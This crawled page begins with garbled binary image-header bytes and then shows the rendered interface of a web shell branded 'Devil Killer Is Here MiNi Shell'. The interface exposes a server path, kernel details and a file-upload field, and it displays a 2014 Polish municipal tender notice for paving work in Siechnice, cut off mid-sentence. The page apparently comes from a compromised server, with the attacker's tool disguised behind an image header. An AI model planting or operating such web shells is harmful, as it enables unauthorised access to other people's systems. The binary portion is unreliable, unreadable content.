JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140822/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140822/279526-N-2014.html

<p class="kh_header"><b>Siechnice: Zagospodarowanie terenów przy Punktach Informacji
Turystycznej w podziale na zadania: 1.Zagospodarowanie terenu przy
Punkcie Informacji Turystycznej w Trestnie 2.Zagospodarowanie
terenu przy Punkcie Informacji Turystycznej w Mokrym Dworze</b><br>
<b>Numer ogłoszenia: 279526 - 2014; data zamieszczenia: 22.08.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Siechnic , ul. Jana Pawła II 12, 55-011 Siechnice, woj. dolnośląskie, tel. 71 391 91 01, faks 71 786 09 07.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.siechnice.gmina.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zagospodarowanie terenów przy Punktach Informacji
Turystycznej w podziale na zadania: 1.Zagospodarowanie terenu przy
Punkcie Informacji Turystycznej w Trestnie 2.Zagospodarowanie
terenu przy Punkcie Informacji Turystycznej w Mokrym Dworze.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest
wykonanie zagospodarowania terenu w miejscowości Mokry Dwór poprzez utwardzenie terenu na działce
gminnej nr 235/2 dla obsługi Punktu Informacji Turystycznej na działce nr 246/27 obręb Mokry Dwór, gmina
Siechnice oraz Trestno poprzez budowę zjazdu z drogi powiatowej nr 1934D oraz utwardzenie terenu dla
obsługi Punktu Informacji Turystycznej na działce gminnej nr 11/3 obręb Blizanowice-Trestno, gmina
Siechnice w celu podniesienia zapewnienia bezpieczeństwa i komfortu korzystania z Punktów Informacji
Turystycznej w ww. miejscowościach. Stan istniejący: 1)Trestno: Teren przeznaczony pod inwestycję (dz.
nr 11/3) jest własnością Gminy Siechnice i jest obecnie zabudowany budynkiem Punktu Informacji
Turystycznej. Droga powiatowa nr 1934D, z której planowana jest budowa zjazdu posiada jezdnię o nawierzchni bitumicznej oraz posiada obustronne pobocze gruntowe o zmiennej szerokości. Pas drogowy
w obrębie projektowanego zjazdu nie posiada infrastruktury podziemnej. 2)Mokry Dwór: Teren
przeznaczony pod inwestycję (działka gminna nr 235/2) jest własnością Gminy Siechnice i położony jest w
granicach pasa drogowego ulicy Stefana Batorego. Pas drogowy w obrębie projektowanego utwardzenia
posiada infrastrukturę podziemną. Zakres zamówienia obejmuje w szczególności: 1)Zadanie 1: Trestno: a)
wykonanie zjazdu o nawierzchni utwardzonej w granicach pasa drogowego - z betonowej kostki brukowej,
b)wykonanie utwardzenia z płyt betonowych typu MEBA 40x60 wypełnionych miałem kamiennym (a nie jak
jest w dokumentacji projektowej miałem kamiennym) na warstwie kruszywa łamanego stabilizowanego
mechanicznie. (Cały zakres prac określa dokumentacja projektowa i STWIORB). 2)Zadanie 2: Mokry Dwór:
a)ułożenie płyt betonowych typu MEBA 40x60 wypełnionych grysem kamiennym (a nie jak jest w
dokumentacji projektowej miałem kamiennym) na warstwie kruszywa łamanego stabilizowanego
mechanicznie. (Cały zakres prac określa dokumentacja projektowa i STWIORB). Zakres przedmiotu
Umowy należy wykonać zgodnie z: 1)dla zadania 1: a)Projektem Budowlanym: Budowa zjazdu z drogi
powiatowej nr 1934D oraz utwardzenie terenu dla obsługi Punktu Informacji Turystycznej na działce
gminnej nr 11/3 obręb Blizanowice-Trestno, gmina Siechnice, opracowany przez MPProjekt Maciej Pisarek,
zatwierdzonym decyzją nr 26/2014 z dnia 8 stycznia 2014 r. zatwierdzającą projekt budowlany i udzielającą
pozwolenia na budowę zjazdu z drogi powiatowej nr 1934D dz. Nr 42/1 na dz. Nr 11/3 oraz utwardzenie
terenu obręb Blizanowice-Trestno, jednostka ewidencyjna Siechnice - obszar wiejski, b)STWIORB,
Stanowiące załącznik nr 12 do specyfikacji istotnych warunków zamówienia 2) dla zadania 2: a)Projektem
Budowlanym: Utwardzenie terenu na działce gminnej nr 235/2 dla obsługi Punktu Informacji Turystycznej
na działce nr 246/27 obręb Mokry Dwór, gmina Siechnice, opracowany przez MPProjekt Maciej Pisarek
wraz z zaświadczeniem nr 98/2013 z dnia 25 listopada 2013 r. o braku sprzeciwu na wykonanie robót
budowlanych polegających na remoncie pobocza drogi gminnej - utwardzenie terenu na dz. Nr 235/2,
246/27 obręb Mokry Dwór, jednostka ewidencyjna Siechnice - obszar wiejski. b)SWIORB Stanowiące
załącznik nr 13 do specyfikacji istotnych warunków zamówienia Zamawiający przekaże wybranemu
Wykonawcy następujące opracowania i dokumenty: 1)po 1 egz. projektów budowlanych 2)po 1 egz.:
STWiORB, 3)po 1 egz. kopii pozwolenia na budowę/zaświadczenia o braku sprzeciwu na wykonanie robót
budowlanych Zamawiający nie dopuszcza składania ofert częściowych. Oferty nie zawierające pełnego
zakresu przedmiotu zamówienia zostaną odrzucone. Każdy wykonawca ma prawo zapoznać się z
zakresem prac w terenie, zgodnie ze SIWZ wraz z załącznikami. Zamawiający zaleca, aby Wykonawca
dokonał wizji lokalnej miejsca realizacji zamówienia, zapoznał się z warunkami lokalno-terenowymi
planowanych robot budowlanych, aby uzyskać informacje, które mogą być konieczne do przygotowania
oferty oraz zawarcia umowy i wykonania zamówienia. Koszty dokonania wizji lokalnej poniesie
Wykonawca. Przedmiot zamówienia obejmuje wszystkie prace wchodzące w zakres realizacji robót
budowlanych. Dokumentacja projektowa w wersji papierowej dostępna jest do wglądu w Urzędzie Miejskim
w Siechnicach pok.204, II piętro w godz. 8.00 - 14.00. Istnieje możliwość zamówienia kopii dokumentacji projektowej (w ciągu 7 dni od złożenia zamówienia) lub możliwość udostępnienia dokumentacji w celu
wykonania kopii we własnym zakresie. Tam, gdzie w SIWZ i dołączonych do niej załącznikach (np. rysunki,
specyfikacje techniczne wykonania i odbioru robót budowlanych, projekty, przedmiary) zostało wskazane
pochodzenie (marka, znak towarowy, producent, dostawca itp.) materiałów lub normy, aprobaty,
specyfikacje i systemy, o których mowa w art. 30 ust. 1 - 3 ustawy Pzp, Zamawiający dopuszcza
oferowanie materiałów lub rozwiązań równoważnych pod warunkiem, że zapewnią uzyskanie parametrów
technicznych nie gorszych od założonych w wyżej wymienionych dokumentach. Przedmiot zamówienie
musi zostać wykonany zgodnie ze specyfikacją istotnych warunków zamówienia, dokumentacją projektową
i zasadami wiedzy technicznej, a Wykonawca zobowiązany jest do wykonania wszelkich prac niezbędnych
do osiągnięcia zakładanego rezultatu, tj. wybudowania obiektu budowlanego będącego przedmiotem
zamówienia. Wykonawca zobowiązany będzie wykonać przedmiot zamówienia: a)z materiałów własnych tj.
wyrobów dopuszczonych do stosowania w budownictwie w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo
budowlane (tekst jedn. Dz. U. z 2010 r. Nr 243 poz. 1623 z późn. zm.) oraz ustawy z dnia 16 kwiecień 2004
r. o wyrobach budowlanych (Dz. U. Nr 92 poz. 881 z późn. zm.); b)zgodnie z postanowieniami niniejszej
SIWZ, zapisami złożonej oferty, dokumentacją i wymaganiami wynikającymi z obowiązujących przepisów
prawa, standardów i norm oraz etyką zawodową i ustalonymi zwyczajami, siłami własnymi lub w systemie
generalnego wykonawstwa. Wykonawca który wygra przetarg zobowiązany jest do wykonania zadania w
terminach od daty zawarcia umowy do dnia: 1)Zadanie 1: 20listopada 2014 r. 2)Zadanie 2: 20 listopada 2014 r.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający w oparciu o art. 67 ust. 1 pkt. 6 Prawo zamówień publicznych przewiduje możliwość
udzielenia zamówień uzupełniających, stanowiących nie więcej niż 50 % wartości zamówienia
podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.12.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.11.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający w oparciu o art. 67 ust. 1 pkt. 6 Prawo zamówień publicznych przewiduje możliwość
udzielenia zamówień uzupełniających, stanowiących nie więcej niż 50 % wartości zamówienia
podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeżeli wykonawca wraz z ofertą złoży podpisane oświadczenia o
spełnieniu warunków w niniejszym postępowaniu zgodnie z wzorem zamieszczonym w
załączniku nr 2 do specyfikacji istotnych warunków zamówienia - Oświadczenie o spełnieniu
warunków udziału w postępowaniu. W przypadku składania oferty przez wykonawców
ubiegających się wspólnie o udzielenie zamówienia, wymagane oświadczenie musi być złożone
przez każdego wykonawcę</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeżeli wykonawca wraz z ofertą złoży podpisany wykaz wykonanych
w okresie pięciu lat przed upływem terminu składania ofert - a jeżeli okres prowadzenia
działalności jest krótszy - w tym okresie, robót budowlanych. W wykazie wykonawca
zobowiązany jest do podania rodzaju, wartości, dat i miejsca wykonania wykazanych robót
budowlanych oraz załączy dowody dotyczące najważniejszych robót, określających, czy te
roboty zostały wykonane w sposób należyty, a także wskazujące, że zostały wykonane zgodnie z
zasadami sztuki budowlanej i prawidłowo ukończone. Wzór wykazu stanowi załącznik nr 6 do
specyfikacji istotnych warunków zamówienia (Wykaz wykonanych/wykonywanych w ciągu
ostatnich pięciu lat robót budowlanych). Dowodami, o których mowa powyżej są: 1)
poświadczenie lub 2)jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie
jest w stanie uzyskać stosownego poświadczenia, oświadczenie wykonawcy. W przypadku, gdy
Zamawiający jest podmiotem na rzecz którego roboty budowlane wskazane w wykazie zostały
wcześniej wykonane, wykonawca nie ma obowiązku przedkładania dowodów, o których mowa w
punkcie 1) i 2). Wykonawca zobowiązany jest do wskazania w ww. wykazie usługi
niewykonanych lub wykonanych nienależycie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeżeli wykonawca wraz z ofertą złoży oświadczenie, że osoby, które
będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnienia budowlane do
kierowania robotami w zakresie zgodnym z przedmiotem zamówienia w specjalności drogowej</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>W celu zweryfikowania rzetelności, kwalifikacji, efektywności i doświadczenia Wykonawca
zobowiązany jest w wykazie, o którym mowa powyżej, wskazać roboty budowlane, wykonane w
okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeśli okres prowadzenia
działalności jest krótszy w tym okresie, odpowiadające w swoim zakresie robotom budowlanym
stanowiącym przedmiot zamówienia (w zakresie technologii wykonania obiektu będącego
przedmiotem zamówienia), wraz z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców,
oraz załączenia dokumentów potwierdzających, że te roboty budowlane zostały wykonane
należycie oraz wskazujące, że zostały wykonane zgodnie z zasadami sztuki budowlanej i
prawidłowo ukończone tj.: co najmniej 2 zadań, polegających na wykonaniu robót budowlanych w
zakresie budowy lub przebudowy miejsc postojowych o powierzchni co najmniej 650 m2 z płyt
ażurowych typu meba;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)Wypełnionego druku oferty - zgodnie ze wzorem stanowiącym załącznik nr 1 do SIWZ - wzór oferty.
Cena zawarta w ofercie musi uwzględniać wszystkie prace wynikające z niniejszej specyfikacji istotnych
warunków zamówienia, dokumentacji technicznej jak i z zalecanej wizji w terenie. Oświadczenie, że
zastosowane przez Wykonawcę przy realizacji zadania materiały będą posiadały właściwości użytkowe
wymagane przy tego typu robotach, a także będą posiadały ważne atesty, aprobaty techniczne i deklaracje
zgodności dopuszczające do stosowania, które na każde żądanie Zamawiającego zostaną niezwłocznie
dostarczone - załącznik nr 4 do specyfikacji istotnych warunków zamówienia 2)oświadczenie o
zaakceptowaniu stawek i narzutów do negocjacji wyceny robót dodatkowych i/lub uzupełniających i/lub zaniechanych - załącznik nr 8 do specyfikacji istotnych warunków zamówienia. W przypadku składania
oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, wymagane oświadczenie
musi być złożone przez każdego wykonawcę w zakresie w jakim jego dotyczy. 3)pełnomocnictwo dla
podmiotów występujących wspólnie (konsorcjum, spółka cywilna), jeżeli zaistnieje taka sytuacja, zgodnie z
art. 23 ustawy Prawo zamówień publicznych. W razie wyboru oferty podmiotów występujących wspólnie,
Zamawiający zażąda przed zawarciem umowy - stosownie do art. 23 ust. 4 - umowy regulującej
współpracę tych podmiotów. Oferta konsorcjum musi spełniać następujące wymagania - zawierać odrębne
i niezależne dla każdego uczestnika konsorcjum wszystkie dokumenty i oświadczenia wymienione
powyżej, podpisana w taki sposób, by zobowiązywała prawnie wszystkie strony - to znaczy podpisana
przez przedstawiciela konsorcjum, którego upoważnienie do złożenia oferty wynika z dołączonego
pełnomocnictwa, udzielonego przez upoważnionych przedstawicieli członków konsorcjum 4)
pełnomocnictwo dla osoby podpisującej ofertę i inne dokumenty w imieniu wykonawcy, jeżeli jest to osoba
nie wykazana w rejestrze</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Z Wykonawcą, który złożył najkorzystniejszą ofertę zostanie zawarta umowa, której istotne postanowienia
stanowi załącznik do niniejszej umowy. W zawiadomieniu o wyborze najkorzystniejszej oferty zostanie
określony termin podpisania umowy. 2.Zamawiający dopuszcza nieistotne zmiany w umowie oraz inne
zmiany postanowień zawartych w istotnych postanowieniach umowy, które Zamawiający przewidział w
ogłoszeniu lub specyfikacji istotnych warunków zamówienia. 3. Zamawiający dopuszcza możliwość
przerwania świadczenia prac nie z winy Wykonawcy, których nie można było przewidzieć lub którym
skutkom nie można było zapobiec, pomimo dołożenia przez Wykonawcę najwyższej staranności (np.:
klęska żywiołowa i inne). Zamawiający dopuszcza zmianę terminu realizacji umowy w przypadku
wystąpienia okoliczności niezależnych od Wykonawcy skutkujących niemożliwością dotrzymania terminu
określonego w Umowie, termin ten może ulec przedłużeniu, nie dłużej jednak niż o czas trwania tych
okoliczności. 4.Zamawiający dopuszcza możliwość zmiany sposobu rozliczania umowy lub dokonywania
płatności. 5.Zamawiający dopuszcza możliwość zmiany stawki podatku VAT w przypadku zmiany
przepisów dotyczących podatku VAT. 6.Zamawiający dopuszcza zmianę przedstawicieli stron umowy. 7.Zamawiający dopuszcza zmianę osób odpowiedzialnych bezpośrednio za realizację zamówienia,
przedstawionych w ofercie, jedynie za uprzednią pisemną zgodą Zamawiającego, akceptując nowe osoby,
w przypadku, gdy: 1)Wykonawca z własnej inicjatywy proponuje zmianę w następujących przypadkach: a)
śmierci, choroby lub innych zdarzeń losowych dotyczących tych osób, b)nie wywiązywania się tych osób z
obowiązków wynikających z umowy, 2)zmiana tych osób stanie się konieczna z jakichkolwiek przyczyn
niezależnych od Wykonawcy (np. rezygnacji), 3)zmiana tych osób stała się konieczna z jakichkolwiek
przyczyn niezależnych. 8.Zamawiający może zażądać od wykonawcy zmiany osób odpowiedzialnych
bezpośrednio za realizację zamówienia, jeżeli uzna, że nie wykonują one swoich obowiązków wynikających
z umowy. Wykonawca zobowiązany jest zmienić te osoby zgodnie z żądaniem Zamawiającego we
wskazanym przez Zamawiającego terminie. 9.W przypadku zmiany którejkolwiek osoby odpowiedzialnej
bezpośrednio za realizację zamówienia nowa osoba musi spełniać wymagania określone w SIWZ dla
danego specjalisty. 10.Po otrzymaniu pisemnej prośby dot. zmiany którejkolwiek osoby odpowiedzialnej
bezpośrednio za realizację zamówienia określonej w umowie, w terminie 14 dni od przekazania,
Zamawiający może wyrazić zgodę na powyższe. 11.Dopuszcza się zmiany na skutek wydanych decyzji,
uzgodnień, faktycznych uwarunkowań terenowych i gruntowych, powodujących konieczność modyfikacji
rozwiązań, z zastrzeżeniem. 12.Innych sytuacji, których nie można było przewidzieć w chwili zawarcia
umowy i mających charakter zmian nieistotnych tj. nie odnoszących się do kwestii, które podlegały ocenie
podczas wyboru Wykonawcy i takich, które gdyby były znane w momencie wszczęcia procedury mającej
na celu wybór Wykonawcy, nie miałyby wpływu na udział większej ilości podmiotów zainteresowanych tą
procedurą. 13.Zamawiający dopuszcza zmianę terminu realizacji umowy lub poszczególnych jej części o
czas trwania poniższych okoliczności, w przypadku: 1)Wystąpienia robót dodatkowych, nie objętych
zamówieniem podstawowym, niezbędnych do jego prawidłowego wykonania, których wykonanie stało się
konieczne na skutek sytuacji niemożliwej wcześniej do przewidzenia, jeżeli: a)z przyczyn technicznych lub
gospodarczych oddzielenie zamówienia dodatkowego od zamówienia podstawowego wymagałoby
poniesienia niewspółmiernie wysokich kosztów, lub b)wykonanie zamówienia podstawowego jest
uzależnione od wykonania zamówienia dodatkowego, a wykonanie zamówienia dodatkowego uniemożliwia
wykonanie zamówienia podstawowego w terminie umownym, 2)wystąpienia okoliczności niezależnych od
Wykonawcy skutkujących niemożliwością dotrzymania terminu określonego w Umowie, 3)konieczności
wprowadzenia zmian w dokumentacji projektowej, a wynikających z konieczności dostosowania zakresu
zadania do wytycznych programowych lub powszechnie obowiązujących przepisów prawa lub 4)opóźnień
Zamawiającego w przekazaniu Wykonawcy dokumentów, do których przekazania Zamawiający był
zobowiązany, 5)działania siły wyższej w rozumieniu przepisów Kodeksu cywilnego lub 6)innych
okoliczności nie powstałych z winy Wykonawcy lub 7)opóźnieniem związanym z uzyskiwaniem przez
